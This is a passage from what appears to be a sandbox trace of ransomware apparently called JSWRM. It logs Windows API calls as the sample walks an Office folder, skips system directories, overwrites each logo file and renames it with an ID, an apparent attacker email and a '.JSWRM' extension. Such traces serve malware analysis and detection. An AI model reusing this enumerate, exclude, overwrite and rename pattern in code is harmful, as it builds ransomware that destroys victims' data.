lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 37 [0133.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.179] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1975) returned 1 [0133.180] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.180] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7b0, lpOverlapped=0x0) returned 1 [0133.181] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.181] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7b0, lpOverlapped=0x0) returned 1 [0133.181] CloseHandle (hObject=0x238) returned 1 [0133.181] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.182] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x892, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogo.scale-100.png", cAlternateFileName="MSAA06~1.PNG")) returned 1 [0133.182] lstrcmpiW (lpString1="MsPubLogo.scale-100.png", lpString2=".") returned 1 [0133.182] lstrcmpiW (lpString1="MsPubLogo.scale-100.png", lpString2="..") returned 1 [0133.182] lstrcmpiW (lpString1="MsPubLogo.scale-100.png", lpString2="...") returned 1 [0133.182] lstrcmpiW (lpString1="MsPubLogo.scale-100.png", lpString2="windows") returned -1 [0133.183] lstrcmpiW (lpString1="MsPubLogo.scale-100.png", lpString2="recovery") returned -1 [0133.183] lstrcmpiW (lpString1="MsPubLogo.scale-100.png", lpString2="perflogs") returned -1 [0133.183] lstrcmpiW (lpString1="MsPubLogo.scale-100.png", lpString2="documents and settings") returned 1 [0133.183] lstrcmpiW (lpString1="MsPubLogo.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.183] lstrcmpiW (lpString1="MsPubLogo.scale-100.png", lpString2="system volume information") returned -1 [0133.183] lstrcmpiW (lpString1="MsPubLogo.scale-100.png", lpString2="msocache") returned 1 [0133.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-100.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-100.png", cchWideChar=23, lpMultiByteStr=0x240fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 23 [0133.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-100.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-100.png", cchWideChar=23, lpMultiByteStr=0x241010, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 23 [0133.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.184] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2194) returned 1 [0133.184] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.184] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x890, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x890, lpOverlapped=0x0) returned 1 [0133.185] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.185] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x890, lpOverlapped=0x0) returned 1 [0133.185] CloseHandle (hObject=0x238) returned 1 [0133.186] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.187] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xac0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogo.scale-140.png", cAlternateFileName="MSD8D3~1.PNG")) returned 1 [0133.187] lstrcmpiW (lpString1="MsPubLogo.scale-140.png", lpString2=".") returned 1 [0133.187] lstrcmpiW (lpString1="MsPubLogo.scale-140.png", lpString2="..") returned 1 [0133.187] lstrcmpiW (lpString1="MsPubLogo.scale-140.png", lpString2="...") returned 1 [0133.187] lstrcmpiW (lpString1="MsPubLogo.scale-140.png", lpString2="windows") returned -1 [0133.187] lstrcmpiW (lpString1="MsPubLogo.scale-140.png", lpString2="recovery") returned -1 [0133.187] lstrcmpiW (lpString1="MsPubLogo.scale-140.png", lpString2="perflogs") returned -1 [0133.187] lstrcmpiW (lpString1="MsPubLogo.scale-140.png", lpString2="documents and settings") returned 1 [0133.187] lstrcmpiW (lpString1="MsPubLogo.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.187] lstrcmpiW (lpString1="MsPubLogo.scale-140.png", lpString2="system volume information") returned -1 [0133.187] lstrcmpiW (lpString1="MsPubLogo.scale-140.png", lpString2="msocache") returned 1 [0133.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-140.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-140.png", cchWideChar=23, lpMultiByteStr=0x241290, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 23 [0133.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-140.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-140.png", cchWideChar=23, lpMultiByteStr=0x2412b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 23 [0133.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.188] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2752) returned 1 [0133.188] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.188] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xac0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xac0, lpOverlapped=0x0) returned 1 [0133.190] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.190] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xac0, lpOverlapped=0x0) returned 1 [0133.190] CloseHandle (hObject=0x238) returned 1 [0133.190] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.191] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcf3, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogo.scale-180.png", cAlternateFileName="MS2668~1.PNG")) returned 1 [0133.191] lstrcmpiW (lpString1="MsPubLogo.scale-180.png", lpString2=".") returned 1 [0133.191] lstrcmpiW (lpString1="MsPubLogo.scale-180.png", lpString2="..") returned 1 [0133.191] lstrcmpiW (lpString1="MsPubLogo.scale-180.png", lpString2="...") returned 1 [0133.191] lstrcmpiW (lpString1="MsPubLogo.scale-180.png", lpString2="windows") returned -1 [0133.191] lstrcmpiW (lpString1="MsPubLogo.scale-180.png", lpString2="recovery") returned -1 [0133.191] lstrcmpiW (lpString1="MsPubLogo.scale-180.png", lpString2="perflogs") returned -1 [0133.191] lstrcmpiW (lpString1="MsPubLogo.scale-180.png", lpString2="documents and settings") returned 1 [0133.191] lstrcmpiW (lpString1="MsPubLogo.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.191] lstrcmpiW (lpString1="MsPubLogo.scale-180.png", lpString2="system volume information") returned -1 [0133.191] lstrcmpiW (lpString1="MsPubLogo.scale-180.png", lpString2="msocache") returned 1 [0133.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-180.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-180.png", cchWideChar=23, lpMultiByteStr=0x240f48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 23 [0133.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-180.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0133.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-180.png", cchWideChar=23, lpMultiByteStr=0x241358, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 23 [0133.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.192] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3315) returned 1 [0133.192] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.192] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xcf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xcf0, lpOverlapped=0x0) returned 1 [0133.195] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.196] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xcf0, lpOverlapped=0x0) returned 1 [0133.196] CloseHandle (hObject=0x238) returned 1 [0133.199] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.200] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7b3, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogo.scale-80.png", cAlternateFileName="MS75BF~1.PNG")) returned 1 [0133.201] lstrcmpiW (lpString1="MsPubLogo.scale-80.png", lpString2=".") returned 1 [0133.201] lstrcmpiW (lpString1="MsPubLogo.scale-80.png", lpString2="..") returned 1 [0133.201] lstrcmpiW (lpString1="MsPubLogo.scale-80.png", lpString2="...") returned 1 [0133.201] lstrcmpiW (lpString1="MsPubLogo.scale-80.png", lpString2="windows") returned -1 [0133.201] lstrcmpiW (lpString1="MsPubLogo.scale-80.png", lpString2="recovery") returned -1 [0133.201] lstrcmpiW (lpString1="MsPubLogo.scale-80.png", lpString2="perflogs") returned -1 [0133.201] lstrcmpiW (lpString1="MsPubLogo.scale-80.png", lpString2="documents and settings") returned 1 [0133.201] lstrcmpiW (lpString1="MsPubLogo.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.201] lstrcmpiW (lpString1="MsPubLogo.scale-80.png", lpString2="system volume information") returned -1 [0133.201] lstrcmpiW (lpString1="MsPubLogo.scale-80.png", lpString2="msocache") returned 1 [0133.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-80.png", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0133.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-80.png", cchWideChar=22, lpMultiByteStr=0x240ef8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 22 [0133.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-80.png", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0133.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.scale-80.png", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 22 [0133.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.202] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1971) returned 1 [0133.202] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.202] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7b0, lpOverlapped=0x0) returned 1 [0133.204] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.204] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7b0, lpOverlapped=0x0) returned 1 [0133.204] CloseHandle (hObject=0x238) returned 1 [0133.204] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.205] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogoSmall.contrast-black_scale-100.png", cAlternateFileName="MSD973~1.PNG")) returned 1 [0133.205] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-100.png", lpString2=".") returned 1 [0133.205] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-100.png", lpString2="..") returned 1 [0133.205] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-100.png", lpString2="...") returned 1 [0133.205] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-100.png", lpString2="windows") returned -1 [0133.205] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0133.206] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0133.206] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0133.206] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.206] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0133.206] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0133.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-100.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-100.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 43 [0133.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-100.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-100.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 43 [0133.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", 